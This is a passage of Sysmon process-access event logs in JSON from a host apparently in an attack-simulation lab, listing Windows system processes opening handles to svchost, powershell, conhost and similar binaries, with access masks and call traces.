06:48:59.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":971,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":972,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.834\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {00000000-0000-0000-0000-000000000000}\r\nTargetProcessId: 2440\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.834","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{00000000-0000-0000-0000-000000000000}","TargetProcessId":"2440","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":973,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.881\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00103D7A0100}\r\nTargetProcessId: 2372\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.881","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00103D7A0100}","TargetProcessId":"2372","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":974,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.881\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00103D7A0100}\r\nTargetProcessId: 2372\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.881","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00103D7A0100}","TargetProcessId":"2372","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":975,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.943\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-00105E400100}\r\nSourceProcessId: 2184\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010773D0100}\r\nTargetProcessId: 2160\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.943","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-00105E400100}","SourceProcessId":"2184","SourceThreadId":"2496","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010773D0100}","TargetProcessId":"2160","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":976,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.943\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-00105F400100}\r\nSourceProcessId: 2192\r\nSourceThreadId: 2500\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nTargetProcessId: 2116\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.943","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-00105F400100}","SourceProcessId":"2192","SourceThreadId":"2500","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","TargetProcessId":"2116","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":977,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.943\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010F66D0100}\r\nSourceProcessId: 2320\r\nSourceThreadId: 2504\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010546B0100}\r\nTargetProcessId: 2312\r\nTargetImage: C:\\Windows\\system32\\compattelrunner.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.943","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010F66D0100}","SourceProcessId":"2320","SourceThreadId":"2504","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010546B0100}","TargetProcessId":"2312","TargetImage":"C:\\Windows\\system32\\compattelrunner.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":978,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.943\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-00102B860100}\r\nSourceProcessId: 2440\r\nSourceThreadId: 2508\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00107F3E0100}\r\nTargetProcessId: 2168\r\nTargetImage: C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.943","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-00102B860100}","SourceProcessId":"2440","SourceThreadId":"2508","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00107F3E0100}","TargetProcessId":"2168","TargetImage":"C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":979,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:00.897\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nTargetProcessId: 2116\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:00.897","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","TargetProcessId":"2116","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":980,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:00.897\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010773D0100}\r\nTargetProcessId: 2160\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 